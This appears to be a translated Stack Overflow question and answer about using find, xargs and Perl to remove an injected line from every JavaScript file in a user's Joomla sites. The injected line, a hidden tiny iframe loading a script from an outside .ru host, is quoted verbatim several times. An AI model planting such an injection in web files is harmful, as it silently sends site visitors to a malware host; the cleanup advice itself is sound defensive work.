1

在我的共享主机帐户上我所有 Joomla 安装的所有 js 文件的末尾都注入了以下恶意行:

;document.write('<iframe src="http://tweakdoled.ru/confirmingunhelpful.cgi?8" scrolling="auto" frameborder="no" align="center" height="13" width="13"></iframe>');

我想使用以下 SSH 命令一次从所有文件中删除它(应该有一些错误):

find ./ -name "*.js" -type f | xargs perl -pi -e 's/;document.write\(\'\<iframe src\=\"http\:\/\/tweakdoled.ru\".*\"\);//g'

问题是由于必须使用反斜杠来转义某些字符,我不知道我是否正确使用它以及应该转义什么。

不用说,该命令不起作用。

有任何想法吗?

谢谢!!

4

1 回答 1

1

使用 Perl\Q...\E表示法暂停元字符。但是,由于要匹配的字符串中有很多字符对于 shell 来说也是特殊的,所以我会将 Perl 正则表达式放入一个文件 ( script.pl) 中,使用%(它不会出现在要替换的字符串中)作为正则表达式分隔符:

s%\Q;document.write('<iframe src="http://tweakdoled.ru/confirmingunhelpful.cgi?8" scrolling="auto" frameborder="no" align="center" height="13" width="13"></iframe>');\E%%g;

然后运行它:

find ./ -name "*.js" -type f | xargs perl -pi.bak -f script.pl

如果你花足够的时间,你可能会找到一种方法让它在没有脚本文件的情况下工作;不过,这可能不值得付出努力(尤其是因为我确定您几天前问过与此非常相似的问题)。

显然,在运行它来编辑文件之前,您将运行一个变体以确保打印出所寻求的行:

script2.pl

print if m%\Q;document.write('<iframe src="http://tweakdoled.ru/confirmingunhelpful.cgi?8" scrolling="auto" frameborder="no" align="center" height="13" width="13"></iframe>');\E%;

运行使用:

find ./ -name "*.js" -type f | xargs perl -n -f script2.pl

如果这没有检测到线条,那么您将追踪一个变化,直到您找到匹配的东西。您可能决定使用类似的东西:

print if m%;document.write.'<iframe src="http://tweakdoled.ru/confirmingunhelpful.cgi?8" scrolling="auto" frameborder="no" align="center" height="13" width="13"></iframe>'.;%;

这将两个括号替换为.(因此,理论上,它可能匹配其他内容,但实际上不会)。

于 2012-11-13T00:56:20.380 回答